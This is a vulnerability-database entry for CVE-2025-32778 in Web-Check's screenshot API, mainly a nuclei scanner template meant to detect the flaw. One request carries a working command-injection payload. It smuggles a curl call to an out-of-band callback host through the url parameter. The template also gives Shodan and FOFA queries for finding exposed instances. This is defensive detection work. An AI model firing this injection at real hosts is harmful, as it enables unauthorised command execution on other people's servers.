Lucene search
K

Web-Check < 2.0.1 Screenshot API - OS Command Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Web-Check screenshot API has OS command injection via unsanitized input; upgrade to version 2.0.1+.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-32778
15 Apr 202520:55
circl
CNNVD
Web-Check 操作系统命令注入漏洞
15 Apr 202500:00
cnnvd
CVE
CVE-2025-32778
15 Apr 202520:19
cve
Cvelist
CVE-2025-32778 Web-Check allows command Injection via Unvalidated URL in Screenshot API
15 Apr 202520:19
cvelist
GithubExploit
Exploit for CVE-2025-32778
17 Aug 202506:29
githubexploit
EUVD
EUVD-2025-11013
3 Oct 202520:07
euvd
Metasploit
Web-Check Screenshot API Command Injection RCE
13 Jan 202618:59
metasploit
NVD
CVE-2025-32778
15 Apr 202521:16
nvd
OSV
CVE-2025-32778 Web-Check allows command Injection via Unvalidated URL in Screenshot API
15 Apr 202520:19
osv
Packet Storm
📄 Web-Check Screenshot API Command Injection
13 Jan 202600:00
packetstorm
Rows per page
id: CVE-2025-32778

info:
  name: Web-Check < 2.0.1 Screenshot API - OS Command Injection
  author: gugacyber
  severity: critical
  description: |
    Lissy93/web-check contains a command injection caused by unsanitized user input in the screenshot API, letting attackers execute arbitrary system commands, exploit requires sending crafted url parameters.
  impact: |
    Attackers can execute arbitrary commands on the host, potentially leading to remote code execution or system compromise.
  remediation: |
    Upgrade Web-Check to version 2.0.1 or later. The fix replaces exec() with execFile(),
    which avoids shell interpretation and properly isolates command arguments.
  reference:
    - https://github.com/Lissy93/web-check/security/advisories/GHSA-jqhf-j4w8-4grr
    - https://github.com/Lissy93/web-check/commit/0e4958aa10b2650d32439a799f6fc83a7cd46cef
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32778
    - https://osv.dev/vulnerability/CVE-2025-32778
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32778
    cwe-id: CWE-78
    epss-score: 0.19761
    epss-percentile: 0.97084
  metadata:
    verified: true
    max-request: 2
    vendor: lissy93
    product: web-check
    shodan-query: http.title:"Web-Check"
    fofa-query: title="Web-Check"
  tags: cve,cve2025,web-check,rce,injection,unauth,oast,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        words:
          - "<title>Web Check"
        part: body
        case-insensitive: true
        internal: true

  - raw:
      - |
        GET /api/screenshot?url=http://x%22%3bcurl${IFS}http://{{interactsh-url}}%3b%23 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ce34849543db607f87dc8ba3ea1ad9d28db007d4df4e20ca242f7c06cc5f155702205ec0c6205327dfd53bd113237efaf4108a84e13f8c91f868c9558fe18ed401fa:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 May 2026 18:46Current
6.1Medium risk
Vulners AI Score6.1
CVSS 49.3
EPSS0.19761
SSVC
16